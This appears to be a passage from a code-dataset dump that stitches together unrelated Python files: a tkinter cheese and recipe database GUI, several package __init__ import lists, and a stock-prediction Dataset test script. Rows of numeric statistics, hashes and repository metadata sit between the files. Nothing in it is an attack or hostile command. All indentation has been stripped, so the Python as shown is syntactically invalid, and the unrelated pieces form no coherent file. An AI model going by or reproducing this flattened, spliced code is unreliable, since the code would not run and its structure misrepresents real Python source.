back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
self.pack()
def del_recipe(self, event):
"""
Asks for name of recipe to delete
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 0)
self.rowconfigure(1, pad = 3, weight = 1)
clabel = tk.Label(self, text = "Recipe name:",
font = ("Arial", 16), bg = "white")
clabel.grid(row = 0, column = 0)
self.area1 = tk.Text(self)
self.area1.grid(row = 1, column = 0, columnspan = 1,
rowspan = 1)
delb = ttk.Button(self, text = "Delete", style = "Slate.TButton")
delb.grid(row = 8, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back", style = "Slate.TButton")
back.grid(row = 9, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.delete_menu)
delb.bind("<1>", self.db_del_recipe)
self.pack()
def db_del_recipe(self, event):
"""
Handles the deletion of the recipe from the actual databaes
:return: returns nothing
"""
recipe_name = self.area1.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
recipe_to_add = None
if (recipe_name == "" or
db_func.row_exists(self.db, recipe_name, "recipes") is False):
self.clean()
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text =
"Error: Recipe not found",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
else:
self.clean()
cursor = self.db.cursor()
cursor.execute("select rowid from recipes where name = ?",
(str(recipe_name),))
reid = cursor.fetchone()[0]
recipe_to_del = table_objects.recipe(reid,
recipe_name, "notimportant", "notimportant")
db_func.del_recipe_row(self.db, recipe_to_del)
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text = "Success!",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
self.pack()
def search_menu(self, event):
"""
Search menu, user decides what to search for
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 1)
self.rowconfigure(3, pad = 3, weight = 1)
softness = ttk.Button(self, text = "Search cheese by softness",
style = "Slate.TButton")
softness.grid(row = 0, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
country = ttk.Button(self, text = "Search cheese by country",
style = "Slate.TButton")
country.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
recipe = ttk.Button(self, text = "Search recipe by cheese",
style = "Slate.TButton")
recipe.grid(row = 2, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 3, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
softness.bind("<1>", self.search_softness)
country.bind("<1>", self.search_country)
recipe.bind("<1>", self.search_recipe)
back.bind("<1>", self.main_menu)
self.pack()
def search_softness(self, event):
"""
Show softnesses in database
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.columnconfigure(1, pad = 3, weight = 0)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 1)
scrollbar = tk.Scrollbar(self)
self.listbox = tk.Listbox(self, yscrollcommand = scrollbar.set)
cursor = self.db.cursor()
cursor.execute("select softness from cheeses")
softnesses = cursor.fetchall()
softnesses = sorted(set(softnesses))
for s in softnesses:
self.listbox.insert(tk.END, str(s[0]))
scrollbar.config(command = self.listbox.yview)
self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
scrollbar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
search = ttk.Button(self, text = "Search",
style = "Slate.TButton")
search.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 2, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
search.bind("<1>", self.show_search_softness)
back.bind("<1>", self.search_menu)
self.pack()
def show_search_softness(self, event):
"""
Show cheeses with selected softness
:return: returns nothing
"""
sel_soft = self.listbox.get(tk.ACTIVE)
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.columnconfigure(1, pad = 3, weight = 0)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
scrollbar = tk.Scrollbar(self)
self.listbox = tk.Listbox(self, yscrollcommand = scrollbar.set)
cursor = self.db.cursor()
cursor.execute("select name from cheeses where softness = ?",
(str(sel_soft),))
cheeses = cursor.fetchall()
cheeses = sorted(set(cheeses))
for s in cheeses:
self.listbox.insert(tk.END, str(s[0]))
scrollbar.config(command = self.listbox.yview)
self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
scrollbar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.search_menu)
self.pack()
def search_country(self, event):
"""
Show countries in database
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.columnconfigure(1, pad = 3, weight = 0)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 1)
scrollbar = tk.Scrollbar(self)
self.listbox = tk.Listbox(self, yscrollcommand = scrollbar.set)
cursor = self.db.cursor()
cursor.execute("select name from countries")
countries = cursor.fetchall()
countries = sorted(set(countries))
for s in countries:
self.listbox.insert(tk.END, str(s[0]))
scrollbar.config(command = self.listbox.yview)
self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
scrollbar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
search = ttk.Button(self, text = "Search",
style = "Slate.TButton")
search.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 2, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
search.bind("<1>", self.show_search_country)
back.bind("<1>", self.search_menu)
self.pack()
def show_search_country(self, event):
"""
Show cheeses associated to selected country
:return: returns nothing
"""
sel_country = self.listbox.get(tk.ACTIVE)
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.columnconfigure(1, pad = 3, weight = 0)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
scrollbar = tk.Scrollbar(self)
self.listbox = tk.Listbox(self, yscrollcommand = scrollbar.set)
cursor = self.db.cursor()
cursor.execute("select rowid from countries where name = ?",
(str(sel_country),))
coid = cursor.fetchone()[0]
cursor.execute("select chid from cheese_country where coid = ?",
(str(coid),))
chids = cursor.fetchall()
cheeses = []
for chid in chids:
cursor.execute("select name from cheeses where rowid = ?",
(str(chid[0]),))
cheeses.append(cursor.fetchone()[0])
cheeses = sorted(set(cheeses))
for s in cheeses:
self.listbox.insert(tk.END, str(s))
scrollbar.config(command = self.listbox.yview)
self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
scrollbar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.search_menu)
self.pack()
def search_recipe(self, event):
"""
Show cheeses with recipes
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.columnconfigure(1, pad = 3, weight = 0)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 1)
scrollbar = tk.Scrollbar(self)
self.listbox = tk.Listbox(self, yscrollcommand = scrollbar.set)
cursor = self.db.cursor()
cursor.execute("select name from cheeses")
cheeses = cursor.fetchall()
cheeses = sorted(set(cheeses))
for s in cheeses:
self.listbox.insert(tk.END, str(s[0]))
scrollbar.config(command = self.listbox.yview)
self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
scrollbar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
search = ttk.Button(self, text = "Search",
style = "Slate.TButton")
search.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 2, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
search.bind("<1>", self.show_search_recipe)
back.bind("<1>", self.search_menu)
self.pack()
def show_search_recipe(self, event):
"""
Show associated recipes
:return: returns nothing
"""
sel_cheese = self.listbox.get(tk.ACTIVE)
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.columnconfigure(1, pad = 3, weight = 0)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 1)
scrollbar = tk.Scrollbar(self)
self.listbox = tk.Listbox(self, yscrollcommand = scrollbar.set)
cursor = self.db.cursor()
cursor.execute("select rowid from cheeses where name = ?",
(str(sel_cheese),))
chid = cursor.fetchone()[0]
cursor.execute("select reid from cheese_recipes where chid = ?",
(str(chid),))
reids = cursor.fetchall()
recipes = []
for reid in reids:
cursor.execute("select name from recipes where rowid = ?",
(str(reid[0]),))
recipes.append(cursor.fetchone()[0])
recipes = sorted(set(recipes))
for s in recipes:
self.listbox.insert(tk.END, str(s))
scrollbar.config(command = self.listbox.yview)
self.listbox.grid(row = 0, column = 0, sticky = tk.E + tk.W)
scrollbar.grid(row = 0, column = 1, sticky = tk.N + tk.S)
details = ttk.Button(self, text = "Details",
style = "Slate.TButton")
details.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 2, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
details.bind("<1>", self.show_recipe_details)
back.bind("<1>", self.search_recipe)
self.pack()
def show_recipe_details(self, event):
"""
Show selected recipe's instructions
:return: returns nothing
"""
sel_recipe = self.listbox.get(tk.ACTIVE)
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 4)
self.rowconfigure(3, pad = 3, weight = 1)
cursor = self.db.cursor()
cursor.execute("select time from recipes where name = ?",
(str(sel_recipe),))
time = cursor.fetchone()[0]
cursor.execute("select instructions from " \
"recipes where name = ?",
(str(sel_recipe),))
instructions = cursor.fetchone()[0]
nlabel = tk.Label(self, text = sel_recipe,
font = ("Arial", 16), bg = "white",
anchor = tk.W, justify = tk.LEFT)
nlabel.grid(row = 0, column = 0)
tlabel = tk.Label(self, text = time,
font = ("Arial", 12), bg = "white",
anchor = tk.W, justify = tk.LEFT)
tlabel.grid(row = 1, column = 0)
ilabel = tk.Label(self, text = instructions,
font = ("Arial", 12), bg = "white",
anchor = tk.W, justify = tk.LEFT)
ilabel.configure(wraplength = self.winfo_width() - 3)
ilabel.grid(row = 2, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 3, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.search_recipe)
self.pack()
| 28.291749
| 82
| 0.620187
| 4,208
| 28,801
| 4.195105
| 0.052519
| 0.026908
| 0.053249
| 0.046111
| 0.836685
| 0.793973
| 0.776299
| 0.749901
| 0.735003
| 0.724183
| 0
| 0.034008
| 0.208743
| 28,801
| 1,017
| 83
| 28.319567
| 0.74062
| 0.023923
| 0
| 0.713004
| 0
| 0
| 0.10269
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010463
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43963e954da0ba78130c8b33fa13b0a2ac4f6676
| 1,022
|
py
|
Python
|
eduu/utils/__init__.py
|
Keys-007/EduuRobot
|
13d75fee3b3c08cd6f1f0c6dcec5df0f542ba851
|
[
"MIT"
] | 1
|
2022-01-01T07:19:42.000Z
|
2022-01-01T07:19:42.000Z
|
eduu/utils/__init__.py
|
Keys-007/EduuRobot
|
13d75fee3b3c08cd6f1f0c6dcec5df0f542ba851
|
[
"MIT"
] | null | null | null |
eduu/utils/__init__.py
|
Keys-007/EduuRobot
|
13d75fee3b3c08cd6f1f0c6dcec5df0f542ba851
|
[
"MIT"
] | null | null | null |
"""EduuRobot utilities."""
# SPDX-License-Identifier: MIT
# Copyright (c) 2018-2022 Amano Team
from typing import List
from .utils import (
EMOJI_PATTERN,
add_chat,
aiowrap,
button_parser,
chat_exists,
check_perms,
commands,
del_restarted,
get_emoji_regex,
get_format_keys,
get_reason_text,
get_restarted,
get_target_user,
http,
pretty_size,
remove_escapes,
require_admin,
run_async,
set_restarted,
shell_exec,
split_quotes,
sudofilter,
time_extract,
)
__all__: List[str] = [
"EMOJI_PATTERN",
"add_chat",
"aiowrap",
"button_parser",
"chat_exists",
"check_perms",
"commands",
"del_restarted",
"get_emoji_regex",
"get_format_keys",
"get_reason_text",
"get_restarted",
"get_target_user",
"http",
"pretty_size",
"remove_escapes",
"require_admin",
"run_async",
"set_restarted",
"shell_exec",
"split_quotes",
"sudofilter",
"time_extract",
]
| 17.62069
| 36
| 0.634051
| 114
| 1,022
| 5.245614
| 0.5
| 0.080268
| 0.050167
| 0.063545
| 0.809365
| 0.809365
| 0.809365
| 0.809365
| 0.809365
| 0.809365
| 0
| 0.010471
| 0.252446
| 1,022
| 57
| 37
| 17.929825
| 0.772251
| 0.08317
| 0
| 0
| 0
| 0
| 0.284946
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.039216
| 0
| 0.039216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43accad8e739fda15cb274b7494c679d52d86153
| 266
|
py
|
Python
|
encrypted_dns/upstream/__init__.py
|
fakegit/Encrypted-DNS
|
bc1f18006b302bb2d9849c214e09ba0bc948738c
|
[
"Apache-2.0"
] | null | null | null |
encrypted_dns/upstream/__init__.py
|
fakegit/Encrypted-DNS
|
bc1f18006b302bb2d9849c214e09ba0bc948738c
|
[
"Apache-2.0"
] | null | null | null |
encrypted_dns/upstream/__init__.py
|
fakegit/Encrypted-DNS
|
bc1f18006b302bb2d9849c214e09ba0bc948738c
|
[
"Apache-2.0"
] | null | null | null |
from encrypted_dns.upstream.base_upstream import Upstream
from encrypted_dns.upstream.tls import TLSUpstream
from encrypted_dns.upstream.https import HTTPSUpstream
from encrypted_dns.upstream.udp import UDPUpstream
from encrypted_dns.upstream.tcp import TCPUpstream
| 44.333333
| 57
| 0.887218
| 36
| 266
| 6.388889
| 0.388889
| 0.282609
| 0.347826
| 0.521739
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075188
| 266
| 5
| 58
| 53.2
| 0.934959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43c4d763334df4f6123eeae0bed61b543872388a
| 192
|
py
|
Python
|
mcunet/utils/__init__.py
|
1999michael/tinyml
|
e8a5c9baef3d8a4890bb7ddbed4f5655cb4fa535
|
[
"MIT"
] | 306
|
2021-01-15T07:49:40.000Z
|
2022-03-31T03:13:20.000Z
|
utils/__init__.py
|
liuyy3364/mcunet
|
f53f9e20e8e912bdb111b4c32da75e71e9a59597
|
[
"Apache-2.0"
] | 9
|
2021-02-04T00:58:33.000Z
|
2022-03-29T06:19:55.000Z
|
utils/__init__.py
|
liuyy3364/mcunet
|
f53f9e20e8e912bdb111b4c32da75e71e9a59597
|
[
"Apache-2.0"
] | 65
|
2021-01-18T06:06:09.000Z
|
2022-03-25T01:42:15.000Z
|
from .flops_counter import *
from .pytorch_utils import *
from .my_modules import *
from .common_tools import *
from .pytorch_modules import *
from .bn_utils import *
from .net_config import *
| 27.428571
| 30
| 0.786458
| 28
| 192
| 5.142857
| 0.464286
| 0.416667
| 0.236111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 192
| 7
| 31
| 27.428571
| 0.872727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
78ddd085041dc1388a3659c68f22ca143128a112
| 9,220
|
py
|
Python
|
test.py
|
thiagofigcosta/stock-pred-v2
|
a2905a2aaf87f083772c9c416aa755f7cf604319
|
[
"MIT"
] | null | null | null |
test.py
|
thiagofigcosta/stock-pred-v2
|
a2905a2aaf87f083772c9c416aa755f7cf604319
|
[
"MIT"
] | null | null | null |
test.py
|
thiagofigcosta/stock-pred-v2
|
a2905a2aaf87f083772c9c416aa755f7cf604319
|
[
"MIT"
] | null | null | null |
#!/bin/python3
# -*- coding: utf-8 -*-
import os
import sys
import time
import numpy as np
from Utils import Utils
from Dataset import Dataset
def dataset_test():
stock_value=[1,2,3,4,5,6,7,8,9,10]
features_values=[[10],[20],[30],[40],[50],[60],[70],[80],[90],100]
dates=Utils.getStrNextNWorkDays('17/06/2021',len(stock_value))
# -------------------
print('-------------------')
dataset=Dataset(name='OriginalGE')
dataset.addCompany(stock_value)
print('Len:',dataset.getSize())
dataset.print()
print('Values:',dataset.getValues())
print('Values Main:',dataset.getValues(only_main_value=True))
# -------------------
print('-------------------')
dataset=Dataset(name='OriginalGE')
dataset.addCompany(stock_value,dates)
print('Len:',dataset.getSize())
dataset.print()
# -------------------
print('-------------------')
dataset=Dataset(name='OriginalGE')
dataset.addCompany(stock_value,dates,features_values)
print('Len:',dataset.getSize())
dataset.print()
print('Indexes:',dataset.getIndexes())
print('Values:',dataset.getValues())
print('Values Main:',dataset.getValues(only_main_value=True))
# -------------------
print('-------------------')
dataset.convertToTemporalValues(3,2)
print('Len:',dataset.getSize())
dataset.print()
print('Indexes:',dataset.getIndexes())
print('Values:',dataset.getValues())
print('Values Main:',dataset.getValues(only_main_value=True))
# -------------------
print('-------------------')
dataset_reverted=dataset.copy()
dataset_reverted.name+=' copy'
dataset_reverted.revertFromTemporalValues()
print('Len:',dataset_reverted.getSize())
dataset_reverted.print()
print('Indexes:',dataset_reverted.getIndexes())
print('Values:',dataset_reverted.getValues())
# -------------------
print('-------------------')
print('Train data:')
start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays()
print('Neural Network Start Index:',start_index)
print('Neural Network X Shape:',dataset_x.shape)
print('Neural Network Y Shape:',dataset_y.shape)
print()
print('Full data:')
start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(include_test_data=True)
print('Neural Network Start Index:',start_index)
print('Neural Network X Shape:',dataset_x.shape)
print('Neural Network Y Shape:',dataset_y.shape)
print()
print('To predict data:')
start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(only_test_data=True)
print('Neural Network Start Index:',start_index)
print('Neural Network X Shape:',dataset_x.shape)
print('Neural Network Y Shape:',dataset_y.shape)
# -------------------
print('-------------------')
stock_value_2=[-el for el in stock_value]
dataset=Dataset(name='OriginalGE and OriginalGE*-1')
dataset.addCompany(stock_value,dates,features_values)
dataset.addCompany(stock_value_2,dates,features_values)
print('Len:',dataset.getSize())
dataset.print()
print('Indexes:',dataset.getIndexes())
print('Values:',dataset.getValues())
print('Values Main:',dataset.getValues(only_main_value=True))
print('Values Splitted by Feature:',dataset.getValuesSplittedByFeature())
# -------------------
print('-------------------')
dataset.convertToTemporalValues(3,2)
print('Len:',dataset.getSize())
dataset.print()
print('Indexes:',dataset.getIndexes())
print('Values:',dataset.getValues())
print('Values Main:',dataset.getValues(only_main_value=True))
# -------------------
print('-------------------')
print('Full data:')
start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(include_test_data=True)
print('Neural Network Start Index:',start_index)
print('Neural Network X Shape:',dataset_x.shape)
print('Neural Network Y Shape:',dataset_y.shape)
print()
print('To predict data:')
start_index_to_pred,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(only_test_data=True)
print('Neural Network Start Index:',start_index_to_pred)
print('Neural Network X Shape:',dataset_x.shape)
print('Neural Network Y Shape:',dataset_y.shape)
print()
print('Train data:')
start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays()
print('Neural Network Start Index:',start_index)
print('Neural Network X Shape:',dataset_x.shape)
print('Neural Network Y Shape:',dataset_y.shape)
start_index_part_2,dataset_x_p1,dataset_x_p2=Dataset.splitNeuralNetworkArray(dataset_x,.7)
print('Train Data Splitted Start Index:',start_index_part_2)
print('Neural Network X Splitted P1 Shape:',dataset_x_p1.shape)
print('Neural Network X Splitted P1 Shape:',dataset_x_p2.shape)
print()
# -------------------
print('-------------------')
dataset_reverted=dataset.copy()
dataset_reverted.name+=' copy'
dataset_reverted.revertFromTemporalValues()
print('Len:',dataset_reverted.getSize())
dataset_reverted.print()
print('Indexes:',dataset_reverted.getIndexes())
print('Values:',dataset_reverted.getValues())
# -------------------
print('-------------------')
correct_predictions=np.array([[[10, -10], [11, -11]],[[11, -11], [12, -12]]])
print('Correct preds shape',correct_predictions.shape)
dataset.setNeuralNetworkResultArray(start_index_to_pred,correct_predictions)
print('Len:',dataset.getSize())
dataset.print()
print('Indexes:',dataset.getIndexes())
print('Values:',dataset.getValues())
print('Indexes degree 1:',dataset.getIndexes(degree=1))
print('Values degree 1:',dataset.getValues(degree=1))
print('Indexes degree 2:',dataset.getIndexes(degree=2))
print('Values degree 2:',dataset.getValues(degree=2))
# -------------------
print('-------------------')
correct_predictions=np.array([[10, -10, 11, -11],[11, -11,12, -12]])
print('Correct preds shape',correct_predictions.shape)
dataset.setNeuralNetworkResultArray(start_index_to_pred,correct_predictions)
print('Len:',dataset.getSize())
dataset.print()
print('Indexes:',dataset.getIndexes())
print('Values:',dataset.getValues())
print('Indexes degree 1:',dataset.getIndexes(degree=1))
print('Values degree 1:',dataset.getValues(degree=1))
print('Indexes degree 2:',dataset.getIndexes(degree=2))
print('Values degree 2:',dataset.getValues(degree=2))
# -------------------
print('-------------------')
dataset_reverted=dataset.copy()
dataset_reverted.name+=' copy'
dataset_reverted.revertFromTemporalValues()
print('Len:',dataset_reverted.getSize())
dataset_reverted.print()
print('Indexes:',dataset_reverted.getIndexes())
print('Values:',dataset_reverted.getValues())
print()
indexes,preds=dataset_reverted.getDatesAndPredictions()
print('Pred Indexes:',indexes)
print('Pred Values:',preds)
print('Indexes degree 1:',dataset.getIndexes(degree=1))
print('Values degree 1:',dataset.getValues(degree=1))
print('Indexes degree 2:',dataset.getIndexes(degree=2))
print('Values degree 2:',dataset.getValues(degree=2))
print('\t*Inner dimmension = companies | After inner dimmension = multiple predictions')
# -------------------
print('-------------------')
dataset=Dataset(name='OriginalGE')
dataset.addCompany(stock_value,dates,features_values)
print('Values:',dataset.getValues())
print('Max:',dataset.getAbsMaxes())
# -------------------
print('-------------------')
dataset.convertToTemporalValues(3,2)
print('Max:',dataset.getAbsMaxes())
# -------------------
print('-------------------')
start_index,dataset_x,dataset_y=dataset.getNeuralNetworkArrays(include_test_data=True,normalization=Dataset.Normalization.NORMALIZE)
print('Neural Network X 0:',dataset_x[0].tolist())
print('Neural Network Y 0:',dataset_y[0].tolist())
# -------------------
print('-------------------')
correct_predictions=np.array([[[1, -1], [1.1, -1.1]],[[1.1, -1.1], [1.2, -1.2]]])
print('Correct preds shape',correct_predictions.shape)
dataset.setNeuralNetworkResultArray(start_index_to_pred,correct_predictions)
print('Len:',dataset.getSize())
dataset.print()
# -------------------
print('-------------------')
dataset=Dataset(name='OriginalGE and OriginalGE*-1')
dataset.addCompany(stock_value,dates)
dataset.addCompany(stock_value_2,dates)
print('Values Main:',dataset.getValues(only_main_value=True))
print('Values Splitted by Feature:',dataset.getValuesSplittedByFeature())
# -------------------
print('-------------------')
dataset=Dataset(name='OriginalGE')
dataset.addCompany(stock_value,dates)
dataset.convertToTemporalValues(4,3)
dataset.print()
correct_predictions=np.array([[[9.1], [10.1], [11.1]],[[10.2], [11.2], [12.2]],[[11.3], [12.3], [13.3]]])
dataset.setNeuralNetworkResultArray(start_index_to_pred-1,correct_predictions)
dataset.print()
dataset.revertFromTemporalValues()
dataset.print()
indexes,preds=dataset.getDatesAndPredictions()
print('Pred Indexes:',indexes)
print('Pred Values:',preds)
tmp_pred_values=[[[] for _ in range(3)] for _ in range(1)]
for i,day_samples in enumerate(preds):
for j,a_prediction in enumerate(day_samples):
for k,company in enumerate(a_prediction):
print(i,j,k,'-',company)
tmp_pred_values[k][j].append(company)
preds=tmp_pred_values
print('Pred Values:',preds)
dataset_test()
| 40.977778
| 134
| 0.675163
| 1,089
| 9,220
| 5.567493
| 0.111111
| 0.042883
| 0.065314
| 0.040079
| 0.83655
| 0.814448
| 0.788059
| 0.780142
| 0.780142
| 0.73495
| 0
| 0.02006
| 0.097072
| 9,220
| 224
| 135
| 41.160714
| 0.708228
| 0.045011
| 0
| 0.788945
| 0
| 0
| 0.218692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005025
| false
| 0
| 0.030151
| 0
| 0.035176
| 0.668342
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
78e731df4869e70f8e9615578e4491150bf9e8c9
| 110
|
py
|
Python
|
helpers/__init__.py
|
ichach-m-i-sc/docker-webexteams-bot-example
|
781932646951164554ae39abb442e5f0acacb491
|
[
"MIT"
] | 4
|
2019-01-26T20:53:44.000Z
|
2020-01-20T19:43:37.000Z
|
helpers/__init__.py
|
ichach-m-i-sc/docker-webexteams-bot-example
|
781932646951164554ae39abb442e5f0acacb491
|
[
"MIT"
] | 6
|
2021-04-29T19:07:04.000Z
|
2021-05-03T15:01:07.000Z
|
helpers/__init__.py
|
ichach-m-i-sc/docker-webexteams-bot-example
|
781932646951164554ae39abb442e5f0acacb491
|
[
"MIT"
] | 4
|
2018-11-10T20:35:11.000Z
|
2021-04-29T19:03:00.000Z
|
from .yaml_helper import *
from .ngrok_helper import *
from .spark_helper import *
from .html_helper import *
| 22
| 27
| 0.781818
| 16
| 110
| 5.125
| 0.4375
| 0.585366
| 0.585366
| 0
| 0
| 0
| 0
| 0
| 0
